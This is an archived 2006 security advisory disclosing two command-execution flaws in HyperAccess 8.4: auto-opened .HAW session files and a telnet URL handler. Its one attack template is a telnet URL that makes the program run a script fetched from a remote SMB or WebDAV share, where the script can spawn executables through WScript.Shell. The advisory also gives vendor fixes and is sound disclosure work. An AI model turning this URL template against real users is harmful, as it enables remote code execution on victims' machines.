what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

hyperaccess84.txt

hyperaccess84.txt
Posted Dec 15, 2006
Authored by Brett Moore SA

Hyper Access version 8.4 suffers from multiple command execution vulnerabilities.

tags | advisory, vulnerability
SHA-256 | f80fc49dfe1d0c19441f024ce5707fa40f9889fac4146b376d88524c20396f30

hyperaccess84.txt

Change Mirror Download
Not long now...

========================================================================
= Hyper Access - Multiple Vulnerabilities
=
= Vendor Website:
= http://www.hilgraeve.com
=
= Affected Software:
= Hyper Access 8.4 (and possibly lower)
=
= Public disclosure on Thursday December 14, 2006
========================================================================

== Overview ==

HyperAccess is the official FULL-POWERED upgrade from HyperTerminal and
HyperTerminal Private Edition. It is the product from which
HyperTerminal
and HyperTerminal Private Edition are derived. HyperAccess offers a wide

array of additional capabilities, with a similar look andfeel.

This advisory discloses two separate (but similar) security issues in
the latest version of HyperAccess .

* Command Execution Through .HAW Opening *

HyperAccess saves 'sessions' as .haw files. These extensions are setup
to
open without user intervention, through the editflags setting the in the

registry key:

HKEY_CLASSES_ROOT\HAWin32\EditFlags.

If a user, using Internet Explorer, browses to a web site that hosts a
.HAW, an automatic download and open can be forced. The file will be
opened and parsed by the installed version of HyperAccess.

A .HAW file can be saved with an option 'Script To Run Before
Connecting'
and this can be setup to load a script file from either an SMB share or

a WEBDAV web share.

The script command offered by HyperAccess include built in commands as
well as standard vbscript. This allows the creation of a script that
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attackers website, and be
able to connect to the remote share.

A suggested fix is to remove/modify the editflags setting to prevent the

automatic opening and parsing of .HAW files.


* Command Execution Through Telnet URL Protocol *

HyperAccess sets up a URL Protocol to handle the telnet:// URL handler.
This setting can be viewed in the registry key:

HKEY_CLASSES_ROOT\telnet\shell\open\command

which is set to

c:\program files\hawin32\hawin32.exe /t %1

HyperAccess will accept /r as a command line parameter to specify a
script file to run. This command can be passed on the URL through
Internet
Explorer using a URL such as;

telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt

Where SERVER is an SMB share or a WEBDAV web share hosting a malicious
script to run.

The script command offered by Hyperaccess include built in commands as
well as standard vbscript. This allows the creation of a script that
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attackers website, and be
able to connect to the remote share.


A suggested fix is to remove the telnet handler from the registry.


== Solutions ==

Currently, the issues outlined in the report have been added to a
list of issues to evaluate during the next update of HyperACCESS.
There is currently no planned date for this update.

== Credit ==

Discovered and advised to Hilgraeve November 10, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and
a high level of technical expertise while creating long and lasting
professional relationships with our clients.

Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of
Australia supplier and sits on the Australian Government
Attorney-General's Department Critical Infrastructure Project panel.
We are certified by both Visa and MasterCard under their Payment
Card Industry Data Security Standard Programs.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close